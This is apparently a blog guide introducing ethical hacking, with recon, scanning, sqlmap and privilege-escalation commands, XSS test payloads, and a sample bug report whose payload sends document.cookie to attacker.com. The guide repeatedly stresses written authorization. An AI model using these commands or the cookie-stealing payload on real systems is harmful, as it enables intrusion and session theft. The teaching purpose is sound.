Application Security
ethical hacking
penetration testing
bug bounty
beginners
+2 more

How to Hack Ethically: The Complete Beginner's Guide for 2026

SCRs Team
April 7, 2026
18 min read
Share

Why Ethical Hacking Is the Fastest-Growing Tech Career

The cybersecurity talent gap hit 3.5 million unfilled positions worldwide in 2025 (ISC² Workforce Study). Companies are desperate for people who can think like attackers — and they're paying for it.

RoleAverage Salary (US)Growth Rate
Penetration Tester$112,000+35%
Bug Bounty Hunter (top 10%)$180,000++52%
Red Team Operator$145,000+40%
Application Security Engineer$135,000+38%

Key insight: You don't need a CS degree. Many top hackers are self-taught. What matters is methodology, persistence, and deep curiosity.


What Is Ethical Hacking?

Ethical hacking (also called penetration testing or white-hat hacking) means testing systems for vulnerabilities with explicit permission from the owner.

The difference between ethical and malicious hacking is authorization:

  • ✅ Bug bounty program → Authorized
  • ✅ Signed penetration testing agreement → Authorized
  • ❌ Testing a website you don't own → Illegal (Computer Fraud and Abuse Act, CFAA)

The 5 Phases of Ethical Hacking

Phase 1: Reconnaissance (Information Gathering)

Before touching a target, you gather as much information as possible.

Passive Recon — No direct contact with the target:

# Find subdomains with subfinder
subfinder -d target.com -silent | sort -u

# Google dorking for sensitive files
site:target.com filetype:pdf OR filetype:xlsx
site:target.com inurl:admin OR inurl:login

# Check for exposed credentials
# Use dehashed.com or pwndb (Tor)

# WHOIS and DNS enumeration
whois target.com
dig target.com ANY +noall +answer

Active Recon — Direct interaction with the target:

# Port scanning with Nmap
nmap -sC -sV -oN scan.txt target.com

# Web technology fingerprinting
whatweb target.com
wappalyzer-cli target.com

# Directory brute-forcing
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt

Phase 2: Scanning & Enumeration

# Vulnerability scanning
nikto -h https://target.com
nuclei -u https://target.com -t cves/

# API endpoint discovery
ffuf -u https://target.com/api/FUZZ -w api-wordlist.txt

# SSL/TLS testing
testssl.sh target.com

Phase 3: Exploitation

This is where you attempt to exploit discovered vulnerabilities:

# Example: Testing for SQL injection with sqlmap
# ONLY on targets you have permission to test
sqlmap -u "https://target.com/search?q=test" --batch --dbs

# Example: Testing for XSS  
# Inject payloads in every input field
<script>alert(document.domain)</script>
"><img src=x onerror=alert(1)>

Phase 4: Post-Exploitation & Privilege Escalation

After gaining initial access, assess the real impact:

# Linux privilege escalation checks
sudo -l
find / -perm -4000 -type f 2>/dev/null
cat /etc/crontab

# Windows privilege escalation
whoami /priv
systeminfo | findstr /B /C:"OS Name"

Phase 5: Reporting

A finding is only valuable if it's clearly documented:

## Finding: Stored XSS in User Profile Bio

**Severity:** High (CVSS 7.6)
**URL:** https://target.com/profile/edit
**Parameter:** bio field
**Payload:** <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>

### Impact
An attacker can inject persistent JavaScript that executes for every user 
viewing the profile. This enables session hijacking, account takeover, 
and data theft.

### Steps to Reproduce
1. Navigate to /profile/edit
2. Enter the payload in the "Bio" field
3. Save the profile
4. Visit the profile page — JavaScript executes

### Remediation
- Sanitize HTML output using DOMPurify
- Implement Content-Security-Policy headers
- Use HttpOnly and Secure flags on session cookies

Essential Tools for Beginners

ToolPurposeFree?
Burp Suite CommunityWeb proxy & scanner
NmapNetwork scanning
SQLMapSQL injection testing
NucleiTemplate-based vuln scanner
John the RipperPassword cracking
HashcatGPU password cracking
GobusterDirectory brute-forcing
Metasploit FrameworkExploitation framework
WiresharkNetwork packet analysis
CyberChefData encoding/decoding

Bug Bounty Platforms to Start On

  1. HackerOne — Largest platform, 2000+ programs
  2. Bugcrowd — Curated programs, good for beginners
  3. Intigriti — European focus, strong community
  4. YesWeHack — Growing fast, good payouts

Beginner-friendly programs:

  • U.S. Department of Defense (Hack the Pentagon)
  • Google VRP
  • GitHub Security Bug Bounty
  • Shopify

Certifications Roadmap

Beginner:
  CompTIA Security+ → eJPT (eLearnSecurity) → CEH

Intermediate:  
  OSCP (OffSec) → BSCP (PortSwigger) → CRTO

Advanced:
  OSWE → OSED → OSCE3

  1. Always get written permission before testing any system
  2. Stay in scope — if a program says "*.target.com", don't test their corporate network
  3. Don't access or exfiltrate real user data — demonstrate the vulnerability, don't exploit it
  4. Document everything — timestamps, screenshots, methodology
  5. Report responsibly — give the vendor time to fix before disclosure

Warning: Even with good intentions, unauthorized testing is a federal crime in most countries. The CFAA (US), Computer Misuse Act (UK), and similar laws carry prison sentences.


Your 90-Day Learning Path

Month 1: Foundations

  • Complete TryHackMe "Pre-Security" and "Jr Penetration Tester" paths
  • Learn Linux basics and Bash scripting
  • Study networking (TCP/IP, DNS, HTTP)

Month 2: Web Application Hacking

  • Complete PortSwigger Web Security Academy (free)
  • Practice on OWASP Juice Shop and DVWA
  • Learn Burp Suite inside and out

Month 3: Real-World Practice

  • Start bug bounty hunting on HackerOne
  • Focus on one vulnerability class (e.g., IDOR or XSS)
  • Read disclosed reports for inspiration

The best hackers aren't the ones with the most tools — they're the ones who understand how applications work at a fundamental level and can spot where developers made assumptions.

Advertisement